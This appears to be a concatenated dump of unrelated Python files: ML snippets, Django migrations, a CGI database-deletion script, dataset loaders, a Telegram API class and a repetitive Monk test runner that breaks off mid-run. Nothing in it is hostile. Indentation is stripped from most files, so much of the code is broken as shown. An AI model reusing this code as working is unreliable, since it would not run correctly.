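            "bin_end": [0.5, 1.0],
            "repeat": [0.8, 0.2],
            "low_confidence": [0.1, 0.3],
            "blank": [0.1, 0.5],
        }
    )
    model = FrameModel(example_probs)
    for instant in (0.0, 2.5, 6.0):
        print(instant, model.get_frame_at_instant(instant, step_time=5.0))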
|
python
|
# Copyright (c) 2020 Graphcore Ltd. All rights reserved.
import torch
import poptorch
# half_stats_begin
model = torch.nn.Sequential()
model.add_module('lin', torch.nn.Linear(16, 16))
model.add_module('bn', torch.nn.BatchNorm1d(16))
model.float()
opts = poptorch.Options()
opts.Precision.runningStatisticsAlwaysFloat(False)
poptorch_model = poptorch.inferenceModel(model, opts)
# half_stats_end
|
python
|
# Generated by Django 2.2.24 on 2022-02-24 22:20
from django.db import migrations
def commit_old_currencies_deactivation(apps, schema_editor):
Currency = apps.get_model("exchange", "Currency")
db_alias = schema_editor.connection.alias
Currency.objects.using(db_alias).filter(code__in=["MRO", "VEF"]).update(active=False)
def rollback_old_currencies_deactivation(apps, schema_editor):
Currency = apps.get_model("exchange", "Currency")
db_alias = schema_editor.connection.alias
Currency.objects.using(db_alias).filter(code__in=["MRO", "VEF"]).update(active=True)
class Migration(migrations.Migration):
dependencies = [
('exchange', '0004_currency_active'),
]
operations = [
migrations.RunPython(commit_old_currencies_deactivation, rollback_old_currencies_deactivation),
]
|
python
|
#! /usr/bin/python
#
# xindice_python_delete.py
#
# Apr/13/2012
#
import math
import cgi
import string
import sys
import os
import xml.dom.minidom
import pycurl
#
import json
# ------------------------------------------------------------------
sys.path.append ('/var/www/data_base/common/python_common')
#
from text_manipulate import dict_delete_proc
from xml_manipulate import xml_to_dict_proc
from xml_manipulate import dict_to_xml_proc
#
from curl_get import curl_get_proc
from curl_get import curl_put_proc
#
from cgi_manipulate import parse_parameter
# ------------------------------------------------------------------
url_base = 'http://host_dbase:8888/xindice/db/'
url_sub = 'cities/cities'
url_in = url_base + url_sub
#
str_aa = curl_get_proc (url_in)
dict_aa=xml_to_dict_proc (str_aa)
#
# ------------------------------------------------------------------
#
#
print "Content-type: text/html\n\n"
#
# ---------------------------------------------------------------
#
print "*** check pppp_qqqq ***<br />"
array_bb = parse_parameter ()
print "*** check ssss_qqqq ***<br />"
#
print "len(array_bb) = %d<br />" % len(array_bb)
for it in range (len(array_bb)):
id_in = array_bb[it]
print "id_in = %s<br />" % id_in
dict_aa=dict_delete_proc (dict_aa,id_in)
print "*** check rrrr ***<br />"
#
print "*** check ssss ***<br />"
out_str = dict_to_xml_proc (dict_aa)
print "*** check tttt ***<br />"
#
#
curl_put_proc (url_in,out_str.encode('utf-8'))
#
#
print "OK<br />"
#
# ---------------------------------------------------------------
|
python
|
"""Wrapper for the CIFAR-10 dataset, which is provided in the `torchvision`
package.
The model and data transform are taken directly from:
https://pytorch.org/tutorials/beginner/blitz/cifar10_tutorial.html
"""
# Chuan-Zheng Lee <[email protected]>
# July 2021
from pathlib import Path
import torch
import torch.nn as nn
import torchvision
import torchvision.transforms as transforms
from config import DATA_DIRECTORY
cifar10_transforms = {
# copied from https://pytorch.org/tutorials/beginner/blitz/cifar10_tutorial.html
'norm1': transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5)),
]),
# copied from https://github.com/akamaster/pytorch_resnet_cifar10/blob/master/trainer.py
'flip-crop-norm2': torchvision.transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.RandomCrop(32, padding=4),
transforms.ToTensor(),
transforms.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),
]),
'norm2': torchvision.transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),
]),
}
def get_cifar10_dataset(train=True, transform='norm1'):
# We want it to download automatically, but torchvision prints a message if it's
# already downloaded, which is kind of annoying, so we check whether it's there
# first and pass download=False if it is.
cifar10_directory = Path(DATA_DIRECTORY) / "cifar10"
download = not (cifar10_directory / "cifar-10-batches-py").exists()
return torchvision.datasets.CIFAR10(
root=cifar10_directory,
train=train,
download=download,
transform=cifar10_transforms[transform],
)
# copied from https://pytorch.org/tutorials/beginner/blitz/cifar10_tutorial.html
class Cifar10CNNSimple(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(3, 6, 5)
self.pool = nn.MaxPool2d(2, 2)
self.conv2 = nn.Conv2d(6, 16, 5)
self.fc1 = nn.Linear(16 * 5 * 5, 120)
self.fc2 = nn.Linear(120, 84)
self.fc3 = nn.Linear(84, 10)
def forward(self, x):
x = self.pool(nn.functional.relu(self.conv1(x)))
x = self.pool(nn.functional.relu(self.conv2(x)))
x = torch.flatten(x, 1) # flatten all dimensions except batch
x = nn.functional.relu(self.fc1(x))
x = nn.functional.relu(self.fc2(x))
x = self.fc3(x)
return x
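if __name__ == "__main__":
    # Hypothetical smoke test (not part of the original module): push a random
    # CIFAR-10-shaped batch through the model to confirm the output shape.
    model = Cifar10CNNSimple()
    dummy_batch = torch.randn(4, 3, 32, 32)  # batch of 4 RGB 32x32 images
    logits = model(dummy_batch)
    print(logits.shape)  # expected: torch.Size([4, 10])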
|
python
|
# A student wants to know their final grade for the Algorithms course.
# The grade is made up of the following percentages:
# 55% of the average of their three partial-exam grades.
# 30% of the final-exam grade.
# 15% of the final-project grade.
parcial1 = float(input("Enter the grade for partial exam 1: "))
parcial2 = float(input("Enter the grade for partial exam 2: "))
parcial3 = float(input("Enter the grade for partial exam 3: "))
examenfinal = float(input("Enter the final exam grade: "))
trabajofinal = float(input("Enter the final project grade: "))
promedio = (parcial1 + parcial2 + parcial3)/3
calificaciónfinal = (promedio * 55)/100 + (examenfinal * 30)/100 + (trabajofinal * 15)/100
print("The final grade for the Algorithms course is %.2f" % (calificaciónfinal))
|
python
|
from ..utils import Object
class EditMessageMedia(Object):
"""
Edits the content of a message with an animation, an audio, a document, a photo or a video. The media in the message can't be replaced if the message was set to self-destruct. Media can't be replaced by self-destructing media. Media in an album can be edited only to contain a photo or a video. Returns the edited message after the edit is completed on the server side
Attributes:
ID (:obj:`str`): ``EditMessageMedia``
Args:
chat_id (:obj:`int`):
The chat the message belongs to
message_id (:obj:`int`):
Identifier of the message
reply_markup (:class:`telegram.api.types.ReplyMarkup`):
The new message reply markup; for bots only
input_message_content (:class:`telegram.api.types.InputMessageContent`):
New content of the message. Must be one of the following types: InputMessageAnimation, InputMessageAudio, InputMessageDocument, InputMessagePhoto or InputMessageVideo
Returns:
Message
Raises:
:class:`telegram.Error`
"""
ID = "editMessageMedia"
def __init__(self, chat_id, message_id, reply_markup, input_message_content, extra=None, **kwargs):
self.extra = extra
self.chat_id = chat_id # int
self.message_id = message_id # int
self.reply_markup = reply_markup # ReplyMarkup
self.input_message_content = input_message_content # InputMessageContent
@staticmethod
def read(q: dict, *args) -> "EditMessageMedia":
chat_id = q.get('chat_id')
message_id = q.get('message_id')
reply_markup = Object.read(q.get('reply_markup'))
input_message_content = Object.read(q.get('input_message_content'))
return EditMessageMedia(chat_id, message_id, reply_markup, input_message_content)
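# Hypothetical construction sketch (not part of the original module); the
# identifiers below are placeholders, and a real request would also need a
# concrete InputMessageContent object:
#
#   req = EditMessageMedia(chat_id=123456, message_id=789, reply_markup=None,
#                          input_message_content=None)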
|
python
|
# Generated by Django 3.0.7 on 2020-09-06 08:59
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('exams', '0020_auto_20200906_1408'),
]
operations = [
migrations.AlterField(
model_name='questionresponse',
name='student_exam',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='responses', to='exams.StudentExam'),
),
]
|
python
|
"""
Tox21 dataset loader.
"""
from __future__ import division
from __future__ import unicode_literals
import os
import logging
import deepchem
import dglt.contrib.moses.moses.data.featurizer as feat
from dglt.contrib.moses.moses.data.reader.utils import AdditionalInfo
from dglt.contrib.moses.moses.data.reader.data_loader import CSVLoader
logger = logging.getLogger(__name__)
def get_tox21_data_path():
data_dir = deepchem.utils.get_data_dir()
dataset_file = os.path.join(data_dir, "tox21.csv.gz")
if not os.path.exists(dataset_file):
deepchem.utils.download_url(
'http://deepchem.io.s3-website-us-west-1.amazonaws.com/datasets/tox21.csv.gz'
)
return dataset_file
dataset_file = get_tox21_data_path()
tox21_ad = AdditionalInfo(dataset_file, smiles_field='smiles')
def load_tox21(featurizer='ECFP', split='index', reload=True, K=1):
"""Load Tox21 datasets. Does not do train/test split"""
# Featurize Tox21 dataset
tox21_tasks = [
'NR-AR', 'NR-AR-LBD', 'NR-AhR', 'NR-Aromatase', 'NR-ER', 'NR-ER-LBD',
'NR-PPAR-gamma', 'SR-ARE', 'SR-ATAD5', 'SR-HSE', 'SR-MMP', 'SR-p53'
]
data_dir = deepchem.utils.get_data_dir()
# TODO: reload should be modified to support cross-validation cases.
if reload and K == 1:
save_dir = os.path.join(data_dir, "tox21/" + featurizer + "/" + str(split))
loaded, all_dataset, transformers = deepchem.utils.save.load_dataset_from_disk(
save_dir)
if loaded:
return tox21_tasks, all_dataset, transformers
dataset_file = get_tox21_data_path()
if featurizer == 'ECFP':
featurizer = feat.CircularFingerprint(size=1024)
elif featurizer == 'GraphConv':
featurizer = feat.ConvMolFeaturizer()
elif featurizer == 'Weave':
featurizer = feat.WeaveFeaturizer()
elif featurizer == 'Raw':
featurizer = feat.RawFeaturizer()
elif featurizer == 'AdjacencyConv':
featurizer = feat.AdjacencyFingerprint(
max_n_atoms=150, max_valence=6)
elif featurizer == 'EAGCN':
featurizer = feat.EagcnFeaturizer(tox21_ad.bond_type_dict, tox21_ad.atom_type_dict)
loader = CSVLoader(
tasks=tox21_tasks, smiles_field="smiles", featurizer=featurizer)
dataset = loader.featurize(dataset_file, shard_size=8192)
# Initialize transformers
transformers = [
deepchem.trans.BalancingTransformer(transform_w=True, dataset=dataset)
]
logger.info("About to transform data")
for transformer in transformers:
dataset = transformer.transform(dataset)
if split is None:
return tox21_tasks, (dataset, None, None), transformers
splitters = {
'index': deepchem.splits.IndexSplitter(),
'random': deepchem.splits.RandomSplitter(),
'scaffold': deepchem.splits.ScaffoldSplitter(),
# 'butina': deepchem.splits.ButinaSplitter(),
# 'task': deepchem.splits.TaskSplitter()
}
splitter = splitters[split]
if K > 1:
fold_datasets = splitter.k_fold_split(dataset, K)
all_dataset = fold_datasets
else:
train, valid, test = splitter.train_valid_test_split(dataset)
all_dataset = (train, valid, test)
if reload:
deepchem.utils.save.save_dataset_to_disk(save_dir, train, valid, test,
transformers)
return tox21_tasks, all_dataset, transformers
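if __name__ == "__main__":
    # Hypothetical usage sketch (not part of the original module): load the
    # dataset with the default ECFP featurizer and an index split, then print
    # the task names and the resulting dataset objects.
    tasks, (train, valid, test), transformers = load_tox21(featurizer='ECFP', split='index')
    print(tasks)
    print(train, valid, test)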
|
python
|
import os
import sys
import time
from monk.pip_functionality_tests.keras.test_default_train import test_default_train
from monk.pip_functionality_tests.keras.test_default_eval_infer import test_default_eval_infer
from monk.pip_functionality_tests.keras.test_update_copy_from import test_update_copy_from
from monk.pip_functionality_tests.keras.test_update_normal import test_update_normal
from monk.pip_functionality_tests.keras.test_update_eval_infer import test_update_eval_infer
from monk.pip_functionality_tests.keras.test_expert_train import test_expert_train
from monk.pip_functionality_tests.keras.test_expert_eval_infer import test_expert_eval_infer
from monk.pip_functionality_tests.keras.test_switch_default import test_switch_default
from monk.pip_functionality_tests.keras.test_switch_expert import test_switch_expert
from monk.pip_functionality_tests.keras.test_compare import test_compare
from monk.pip_functionality_tests.keras.test_analyse import test_analyse
def run_functionality_tests():
origstdout = sys.stdout
print("Running Tests...");
sys.stdout = open("test_logs.txt", 'w');
system_dict = {};
system_dict["total_tests"] = 0;
system_dict["successful_tests"] = 0;
system_dict["failed_tests_lists"] = [];
system_dict["failed_tests_exceptions"] = [];
system_dict["skipped_tests_lists"] = [];
start = time.time()
print("Running 1/11");
system_dict = test_default_train(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 2/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_default_eval_infer(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 3/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_update_copy_from(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 4/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_update_normal(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 5/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_update_eval_infer(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 6/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_expert_train(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("Running 7/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_expert_eval_infer(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 8/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_switch_default(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 9/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_switch_expert(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 10/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_compare(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running 11/11");
sys.stdout = open("test_logs.txt", 'a');
system_dict = test_analyse(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
sys.stdout = open("test_logs.txt", 'a');
end = time.time();
print("Total Tests - {}".format(system_dict["total_tests"]));
print("Time Taken - {} sec".format(end-start));
print("Num Successful Tests - {}".format(system_dict["successful_tests"]));
print("Num Failed Tests - {}".format(len(system_dict["failed_tests_lists"])));
print("Num Skipped Tests - {}".format(len(system_dict["skipped_tests_lists"])));
print("");
for i in range(len(system_dict["failed_tests_lists"])):
print("{}. Failed Test:".format(i+1));
print("Name - {}".format(system_dict["failed_tests_lists"][i]));
print("Error - {}".format(system_dict["failed_tests_exceptions"][i]));
print("");
print("Skipped Tests List - {}".format(system_dict["skipped_tests_lists"]));
print("");
sys.stdout = origstdout;
print("Total Tests - {}".format(system_dict["total_tests"]));
print("Time Taken - {} sec".format(end-start));
print("Num Successful Tests - {}".format(system_dict["successful_tests"]));
print("Num Failed Tests - {}".format(len(system_dict["failed_tests_lists"])));
print("Num Skipped Tests - {}".format(len(system_dict["skipped_tests_lists"])));
print("See test_logs.txt for errors");
print("");
os.system("rm -r workspace");
def run_unit_tests():
from monk.pip_unit_tests.keras.test_optimizer_sgd import test_optimizer_sgd
from monk.pip_unit_tests.keras.test_optimizer_nesterov_sgd import test_optimizer_nesterov_sgd
from monk.pip_unit_tests.keras.test_optimizer_rmsprop import test_optimizer_rmsprop
from monk.pip_unit_tests.keras.test_optimizer_adam import test_optimizer_adam
from monk.pip_unit_tests.keras.test_optimizer_nadam import test_optimizer_nadam
from monk.pip_unit_tests.keras.test_optimizer_adamax import test_optimizer_adamax
from monk.pip_unit_tests.keras.test_optimizer_adadelta import test_optimizer_adadelta
from monk.pip_unit_tests.keras.test_optimizer_adagrad import test_optimizer_adagrad
from monk.pip_unit_tests.keras.test_loss_l1 import test_loss_l1
from monk.pip_unit_tests.keras.test_loss_l2 import test_loss_l2
from monk.pip_unit_tests.keras.test_loss_crossentropy import test_loss_crossentropy
from monk.pip_unit_tests.keras.test_loss_binary_crossentropy import test_loss_binary_crossentropy
from monk.pip_unit_tests.keras.test_loss_kldiv import test_loss_kldiv
from monk.pip_unit_tests.keras.test_loss_hinge import test_loss_hinge
from monk.pip_unit_tests.keras.test_loss_squared_hinge import test_loss_squared_hinge
origstdout = sys.stdout
print("Running Tests...");
sys.stdout = open("test_logs.txt", 'w');
system_dict = {};
system_dict["total_tests"] = 0;
system_dict["successful_tests"] = 0;
system_dict["failed_tests_lists"] = [];
system_dict["failed_tests_exceptions"] = [];
system_dict["skipped_tests_lists"] = [];
start = time.time()
exp_num = 1;
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_sgd(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_nesterov_sgd(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_rmsprop(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adam(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_nadam(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adamax(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adadelta(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_optimizer_adagrad(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_l1(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_l2(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_crossentropy(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_binary_crossentropy(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_kldiv(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_hinge(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_loss_squared_hinge(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
from monk.pip_unit_tests.keras.test_layer_convolution1d import test_layer_convolution1d
from monk.pip_unit_tests.keras.test_layer_convolution2d import test_layer_convolution2d
from monk.pip_unit_tests.keras.test_layer_convolution3d import test_layer_convolution3d
from monk.pip_unit_tests.keras.test_layer_transposed_convolution2d import test_layer_transposed_convolution2d
from monk.pip_unit_tests.keras.test_layer_transposed_convolution3d import test_layer_transposed_convolution3d
from monk.pip_unit_tests.keras.test_layer_max_pooling1d import test_layer_max_pooling1d
from monk.pip_unit_tests.keras.test_layer_max_pooling2d import test_layer_max_pooling2d
from monk.pip_unit_tests.keras.test_layer_max_pooling3d import test_layer_max_pooling3d
from monk.pip_unit_tests.keras.test_layer_average_pooling1d import test_layer_average_pooling1d
from monk.pip_unit_tests.keras.test_layer_average_pooling2d import test_layer_average_pooling2d
from monk.pip_unit_tests.keras.test_layer_average_pooling3d import test_layer_average_pooling3d
from monk.pip_unit_tests.keras.test_layer_global_max_pooling1d import test_layer_global_max_pooling1d
from monk.pip_unit_tests.keras.test_layer_global_max_pooling2d import test_layer_global_max_pooling2d
from monk.pip_unit_tests.keras.test_layer_global_max_pooling3d import test_layer_global_max_pooling3d
from monk.pip_unit_tests.keras.test_layer_global_average_pooling1d import test_layer_global_average_pooling1d
from monk.pip_unit_tests.keras.test_layer_global_average_pooling2d import test_layer_global_average_pooling2d
from monk.pip_unit_tests.keras.test_layer_global_average_pooling3d import test_layer_global_average_pooling3d
from monk.pip_unit_tests.keras.test_layer_batch_normalization import test_layer_batch_normalization
from monk.pip_unit_tests.keras.test_layer_identity import test_layer_identity
from monk.pip_unit_tests.keras.test_layer_fully_connected import test_layer_fully_connected
from monk.pip_unit_tests.keras.test_layer_dropout import test_layer_dropout
from monk.pip_unit_tests.keras.test_layer_flatten import test_layer_flatten
from monk.pip_unit_tests.keras.test_layer_concatenate import test_layer_concatenate
from monk.pip_unit_tests.keras.test_layer_add import test_layer_add
from monk.pip_unit_tests.keras.test_activation_relu import test_activation_relu
from monk.pip_unit_tests.keras.test_activation_softmax import test_activation_softmax
from monk.pip_unit_tests.keras.test_activation_thresholded_relu import test_activation_thresholded_relu
from monk.pip_unit_tests.keras.test_activation_elu import test_activation_elu
from monk.pip_unit_tests.keras.test_activation_prelu import test_activation_prelu
from monk.pip_unit_tests.keras.test_activation_leaky_relu import test_activation_leaky_relu
from monk.pip_unit_tests.keras.test_activation_selu import test_activation_selu
from monk.pip_unit_tests.keras.test_activation_softplus import test_activation_softplus
from monk.pip_unit_tests.keras.test_activation_softsign import test_activation_softsign
from monk.pip_unit_tests.keras.test_activation_tanh import test_activation_tanh
from monk.pip_unit_tests.keras.test_activation_sigmoid import test_activation_sigmoid
from monk.pip_unit_tests.keras.test_activation_hard_sigmoid import test_activation_hard_sigmoid
from monk.pip_unit_tests.keras.test_initializer_xavier_normal import test_initializer_xavier_normal
from monk.pip_unit_tests.keras.test_initializer_xavier_uniform import test_initializer_xavier_uniform
from monk.pip_unit_tests.keras.test_initializer_random_normal import test_initializer_random_normal
from monk.pip_unit_tests.keras.test_initializer_random_uniform import test_initializer_random_uniform
from monk.pip_unit_tests.keras.test_initializer_lecun_normal import test_initializer_lecun_normal
from monk.pip_unit_tests.keras.test_initializer_lecun_uniform import test_initializer_lecun_uniform
from monk.pip_unit_tests.keras.test_initializer_he_normal import test_initializer_he_normal
from monk.pip_unit_tests.keras.test_initializer_he_uniform import test_initializer_he_uniform
from monk.pip_unit_tests.keras.test_initializer_truncated_normal import test_initializer_truncated_normal
from monk.pip_unit_tests.keras.test_initializer_orthogonal import test_initializer_orthogonal
from monk.pip_unit_tests.keras.test_initializer_variance_scaling import test_initializer_variance_scaling
from monk.pip_unit_tests.keras.test_block_resnet_v1 import test_block_resnet_v1
from monk.pip_unit_tests.keras.test_block_resnet_v2 import test_block_resnet_v2
from monk.pip_unit_tests.keras.test_block_resnet_v1_bottleneck import test_block_resnet_v1_bottleneck
from monk.pip_unit_tests.keras.test_block_resnet_v2_bottleneck import test_block_resnet_v2_bottleneck
from monk.pip_unit_tests.keras.test_block_resnext import test_block_resnext
from monk.pip_unit_tests.keras.test_block_mobilenet_v2_linear_bottleneck import test_block_mobilenet_v2_linear_bottleneck
from monk.pip_unit_tests.keras.test_block_mobilenet_v2_inverted_linear_bottleneck import test_block_mobilenet_v2_inverted_linear_bottleneck
from monk.pip_unit_tests.keras.test_block_squeezenet_fire import test_block_squeezenet_fire
from monk.pip_unit_tests.keras.test_block_densenet import test_block_densenet
from monk.pip_unit_tests.keras.test_block_conv_bn_relu import test_block_conv_bn_relu
from monk.pip_unit_tests.keras.test_block_inception_a import test_block_inception_a
from monk.pip_unit_tests.keras.test_block_inception_b import test_block_inception_b
from monk.pip_unit_tests.keras.test_block_inception_c import test_block_inception_c
from monk.pip_unit_tests.keras.test_block_inception_d import test_block_inception_d
from monk.pip_unit_tests.keras.test_block_inception_e import test_block_inception_e
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_convolution3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_transposed_convolution2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_transposed_convolution3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_max_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_max_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_max_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_average_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_average_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_average_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_max_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_max_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_max_pooling3d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_average_pooling1d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
system_dict = test_layer_global_average_pooling2d(system_dict)
sys.stdout = origstdout;
print("Tests Completed - {}".format(system_dict["total_tests"]));
print("Tests Succesful - {}".format(system_dict["successful_tests"]));
print("")
print("Running {}/<num>".format(exp_num));
exp_num += 1;
